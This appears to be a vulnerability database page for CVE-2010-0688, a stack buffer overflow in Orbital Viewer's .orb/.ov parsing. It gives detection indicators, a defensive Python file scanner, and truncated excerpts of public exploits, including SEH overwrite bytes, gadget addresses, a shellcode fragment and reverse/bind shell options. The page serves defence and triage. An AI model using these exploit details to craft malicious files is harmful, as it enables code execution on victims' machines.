CVE-2010-0688
Published 2010-03-19

CVE-2010-0688: Stack-based buffer overflow in Orbital Viewer 1.04 allows user-assisted remote attackers to execute arbitrary code via a crafted (1) .orb or (2) .ov file.

Priority: P3 50 · Severity: critical · CVSS 2.0 base score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 37.90% (98.4th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| orbitals | orbital_viewer | — | — |
Detection & IOCs (extracted from sources)

Byte patterns quoted from the public exploits:
- `OrbitalFileV1.0`: file header magic of .orb/.ov files
- `\x50\x82\x45`: 3-byte partial SEH overwrite address (exploit 11581)
- `\x0b\x0b\x27\x00`: SEH overwrite value used in exploit 13940
- `\xeb\xf9\x90\x90`, `\xeb\xf9\xff\xff`: nSEH short backward jumps
- `\xe9\xc8\xf9\xff\xff`, `\xe9\x52\xfe\xff\xff`: near backward jumps that land in the padding/NOP sled
- Malicious .orb or .ov files begin with the magic header 'OrbitalFileV1.0' followed by CR/LF or LF. Files exploiting CVE-2010-0688 contain this header followed by a large (~5045–6060 byte) buffer of padding, NOP sleds and shellcode before the SEH overwrite bytes.
- The overflow is triggered by fscanf reading into a fixed-size stack buffer with no bounds checking when parsing .ORB files. Look for abnormally large single-line content (thousands of bytes) in .orb/.ov files after the OrbitalFileV1.0 header.
- SEH-based exploitation: monitor for SEH chain overwrites in the ov.exe process. Known PPR (pop/pop/ret) gadget addresses: 0x004032a2 (Metasploit module) and the 3-byte partial overwrite 0x??458250 (bytes \x50\x82\x45) from ov.exe.
- Bad characters for payload encoding in this exploit are \x00\x09\x0a\x0d\x20; shellcode in a malicious .orb file will avoid these bytes.
- The reverse shell payload in the exploit connects back on port 4444 from the victim to attacker IP 192.168.2.10; the bind shell listens on port 4444 on the victim (RHOST=192.168.2.55). Network detection should alert on unexpected outbound connections from ov.exe.
- The partial SEH overwrite address (\x50\x82\x45) from exploit 11581 is a 3-byte partial overwrite specific to ov.exe on Windows XP SP3 and may differ across builds/service packs.
- The PPR gadget at 0x00457C03 used in exploit 13940 is labelled 'universal' but is specific to ov.exe on Windows XP SP2.
- The Metasploit module PPR gadget 0x004032a2 is specific to ov.exe version 1.0.0.2 on Windows XP SP3; other versions of ov.exe require different return addresses.
- Payload space is limited to 2048 bytes in the Metasploit module because of the fixed-size stack buffer.
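A file-level triage check for the indicators listed above (header magic, an abnormally long line after the header, backward-jump bytes and NOP sleds), written as an added example for this page; it is not code from the page or from any of the exploit authors. The 1024-byte line threshold, the indicator names and the constructed sample files are assumptions.

```python
import re
import sys

MAGIC = b"OrbitalFileV1.0"
# Threshold is an assumption: legitimate orbital descriptions are short text
# lines, while the public exploits put 5045-6060 bytes on a single line.
MAX_LINE = 1024
# Byte patterns quoted on the page: short and near backward jumps used for
# nSEH / the "fly-by" stub, and the NOP sled those jumps land on.
SUSPICIOUS = {
    "nseh_short_jmp_back": re.compile(rb"\xeb\xf9"),
    "near_jmp_back": re.compile(rb"\xe9[\x00-\xff]{2}\xff\xff"),
    "nop_sled": re.compile(rb"\x90{16,}"),
}


def scan_orb(data: bytes) -> dict:
    """Classify a file body as not-orb, clean or suspicious."""
    result = {"has_magic": False, "longest_line": 0, "indicators": [],
              "verdict": "not-orb"}
    if not data.startswith(MAGIC):
        return result
    result["has_magic"] = True
    result["verdict"] = "clean"
    body = data[len(MAGIC):]
    # The header may be followed by CR/LF or LF; normalise before splitting.
    lines = body.replace(b"\r\n", b"\n").split(b"\n")
    result["longest_line"] = max(len(line) for line in lines)
    if result["longest_line"] > MAX_LINE:
        result["indicators"].append("oversized-line")
    for name, pattern in SUSPICIOUS.items():
        if pattern.search(body):
            result["indicators"].append(name)
    if result["indicators"]:
        result["verdict"] = "suspicious"
    return result


if __name__ == "__main__":
    # Constructed samples: a benign file with short lines, and a file that
    # carries only the oversized padding line plus a NOP sled (no shellcode).
    samples = {
        "benign.orb": b"OrbitalFileV1.0\r\n" + b"short line\n" * 3,
        "oversized.ov": b"OrbitalFileV1.0\n" + b"A" * 5045 + b"\x90" * 32 + b"\n",
    }
    for path in sys.argv[1:]:          # any real files given on the command line
        with open(path, "rb") as fh:
            samples[path] = fh.read()
    for name, data in samples.items():
        print(name, scan_orb(data))
```

Run it without arguments to see the two constructed samples classified, or pass .orb/.ov paths to triage real files.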
Exploit-DB: Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)
exploitdb · 2010-06-19 · CVE-2010-0688

```perl
#!usr/bin/perl
#########################################################################################
#Pro: Orbital Viewer v1.04 (.orb/.ov) Local Universal Stack Overflow Exploit [SEH]
#Author: Crazy_Hacker
#Download: http://www.orbitals.com/orb/setupov.exe
#Date: 20-6-2010
#Tested: WinXp SP2
##########################################################################################
$junk = 6060;
$header = "OrbitalFileV1.0\n";
$nseh = "\xeb\xf9\xff\xff"; # jmp back 7 bytes
$seh = "\x0b\x0b\x27\x00"; # universal pop ebx - pop eax - ret at 0x00457C03 [ov.exe]
$fly_by = "\xe9\x52\xfe\xff\xff"; # jmp back 430 bytes = land on A's => nops => shellcode
#calc
$shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x4
```
Exploit-DB: Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)
exploitdb · 2010-03-09 · CVE-2010-0688

```ruby
##
# $Id: orbital_viewer_orb.rb 8757 2010-03-09 05:57:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Orbital Viewer ORB File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in David Manthey's
Orbital Viewer. When processing .ORB files, data is read from file into
a fixed-size stack buffer using the fscanf function. Since no bounds
checking is done, a buffer overflow can occur. Attackers can execute
arbitrary c
```
Exploit-DB: Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)
exploitdb · 2010-02-26 · CVSS 9.3 · CVE-2010-0688 [CRITICAL]

```python
#!/usr/bin/python
#
################################################################
#
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows xp sp3
#
################################################################
# Bad chars: \x00\x0a\xbd\x0d\x20
# Here we go.. ! ...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
# 1: calc.exe
# 2: reverse shell
# 3: bind shell
# [+] which shellcode? 2
# [+] Vu
```
Metasploit: Orbital Viewer ORB File Parsing Buffer Overflow

This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from file into a fixed-size stack buffer using the fscanf function. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/38720
- http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/
- http://www.exploit-db.com/exploits/13940
- http://www.osvdb.org/62580
- http://www.securityfocus.com/bid/38436
- http://www.securityfocus.com/bid/40985
- http://www.vupen.com/english/advisories/2010/0478
- https://exchange.xforce.ibmcloud.com/vulnerabilities/59560